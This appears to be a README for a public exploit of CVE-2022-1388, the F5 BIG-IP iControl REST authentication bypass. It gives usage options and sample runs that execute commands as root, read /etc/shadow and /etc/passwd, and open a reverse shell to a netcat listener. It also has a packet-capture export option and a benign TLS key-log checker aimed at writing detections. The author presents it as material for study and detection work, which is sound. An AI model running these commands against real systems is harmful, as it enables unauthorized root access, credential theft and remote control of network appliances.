The author is not responsible or held liable for any actions taken with any aspect of this project/repository. I created this for the purposes of understanding the attack as well as writing detections within a SIEM and wanted to share for others to do the same. Use at your own risk.
This exploit targets CVE-2022-1388, the iControl REST authentication bypass in F5 BIG-IP. Please see the F5 advisory (https://support.f5.com/csp/article/K23605346) for affected versions and other information.
Feel free to PR or report any issues. This was tested on a few vulnerable F5 VE instances in Google Cloud from a CentOS machine with Python 3.6.
```
CVE-2022-1388.py [-h] -t TARGET -p PORT [-c CMD] [-s] [-e] [-lh LHOST] [-lp LPORT]

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET, --RHOSTS TARGET
                        Target IP of vulnerable BIG-IP system
  -p PORT, --port PORT, --RPORT PORT
                        Target port on vulnerable BIG-IP system
  -c CMD, --cmd CMD, --command CMD
                        Command to run on target system
  -e, --export, --tcpdump
                        Export captured traffic and ssl-key.log | **Requires sudo privileges!
  -q, --quiet           Don't display banner
  -s, --shell           Launch an interactive shell
  -lh LHOST, --lhost LHOST, --LHOST LHOST
                        Required for -s [shell]; Local IP/interface to bind listener to
  -lp LPORT, --lport LPORT, --LPORT LPORT
                        Required for -s [shell]; Local port to bind listener to
```
```
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c id
===============================================================================================================
[+] CVE-2022-1388 Exploit affecting F5 BIG-IP
[+] Author: vaelwolf
[+] Remediation:
    Upgrade to a patched version found in the vendor advisory: https://support.f5.com/csp/article/K23605346
[!] For educational use only! Use at your own risk.
===============================================================================================================
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
```
```
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c "cat /etc/shadow" -q
root:!!:18656:0:99999:7:::
bin:*:16479:0:99999:7:::
daemon:*:16479:0:99999:7:::
adm:*:16479:0:99999:7:::
lp:*:16479:0:99999:7:::
mail:*:16479:0:99999:7:::
uucp:*:16479:0:99999:7:::
[[ removed for brevity ]]
```
Attacker:

```
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -s -lh 10.142.0.8 -lp 4444
===============================================================================================================
[+] CVE-2022-1388 Exploit affecting F5 BIG-IP
[+] Author: vaelwolf
[+] Remediation:
    Upgrade to a patched version found in the vendor advisory: https://support.f5.com/csp/article/K23605346
[!] For educational use only! Use at your own risk.
===============================================================================================================
[+] If you haven't already, please start your listener of choice on port 4444
[+] Press any key to continue...
[+] Exploit finished. If you launched a reverse shell listener, check there for your terminal!
```
Listener:

```
$ nc -lp 4444
bash: no job control in this shell
[@localhost:Active:Standalone] restjavad # whoami
whoami
root
```
Specifying the -e (--export) flag will create two files: detection.pcap and ssl-key.log. These files are overwritten every time the -e flag is specified, so remember to move or rename any files you wish to keep. The ssl-key.log can be imported into Wireshark via Preferences -> Protocols -> TLS -> (Pre)-Master-Secret log filename to decrypt the TLS session. Note that because tcpdump is used, the script must be run with sudo when -e is given.

```
$ sudo python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c "cat /etc/passwd" -q -e
[+] Starting tcpdump on port 8443 for 5 seconds
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
[[ removed for brevity ]]
```
Before TLS Decryption:
Adding the automatically-exported ssl-key.log to the TLS preferences in Wireshark:
After TLS Decryption:
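If Wireshark still shows only encrypted Application Data after loading the key file, the usual cause is a malformed or incomplete ssl-key.log. The checker below is an added example, not part of this repository; it assumes the exported file uses the NSS key log format that Wireshark's (Pre)-Master-Secret preference expects, and it runs on a constructed sample rather than a real export.

```python
"""Sanity-check an NSS-format TLS key log (such as ssl-key.log) before loading it into Wireshark."""
import re
from collections import defaultdict

# Labels Wireshark accepts in a (Pre)-Master-Secret log file.
TLS12_LABEL = "CLIENT_RANDOM"
TLS13_LABELS = {"CLIENT_HANDSHAKE_TRAFFIC_SECRET", "SERVER_HANDSHAKE_TRAFFIC_SECRET",
                "CLIENT_TRAFFIC_SECRET_0", "SERVER_TRAFFIC_SECRET_0", "EXPORTER_SECRET"}
HEX = re.compile(r"^(?:[0-9a-fA-F]{2})+$")  # non-empty, even-length hex

def parse_keylog(text):
    """Return (sessions, errors): sessions maps client_random -> set of labels seen for it."""
    sessions, errors = defaultdict(set), []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):  # blank lines and comments are allowed
            continue
        parts = line.split()
        if len(parts) != 3:
            errors.append(f"line {lineno}: expected '<label> <client_random> <secret>'")
        elif parts[0] != TLS12_LABEL and parts[0] not in TLS13_LABELS:
            errors.append(f"line {lineno}: unknown label {parts[0]}")
        elif len(parts[1]) != 64 or not HEX.match(parts[1]):  # client random is 32 bytes
            errors.append(f"line {lineno}: client_random is not 32 bytes of hex")
        elif not HEX.match(parts[2]):
            errors.append(f"line {lineno}: secret is not valid hex")
        else:
            sessions[parts[1]].add(parts[0])
    return dict(sessions), errors

def decryptable_sessions(sessions):
    """Client randoms with enough material for Wireshark to decrypt application data."""
    app_data_13 = {"CLIENT_TRAFFIC_SECRET_0", "SERVER_TRAFFIC_SECRET_0"}
    return sorted(cr for cr, labels in sessions.items()
                  if TLS12_LABEL in labels or app_data_13 <= labels)

# Constructed sample: one TLS 1.2 session, one TLS 1.3 session, one malformed line.
SAMPLE = "\n".join([
    "# comment line",
    "CLIENT_RANDOM " + "aa" * 32 + " " + "11" * 48,
    "CLIENT_TRAFFIC_SECRET_0 " + "bb" * 32 + " " + "44" * 32,
    "SERVER_TRAFFIC_SECRET_0 " + "bb" * 32 + " " + "55" * 32,
    "CLIENT_RANDOM deadbeef " + "66" * 48,
])

if __name__ == "__main__":
    sessions, errors = parse_keylog(SAMPLE)
    print(len(decryptable_sessions(sessions)), "decryptable session(s);", errors)
```

To check a real export, replace SAMPLE with the contents of ssl-key.log; a session missing from decryptable_sessions() is one Wireshark will not be able to decrypt.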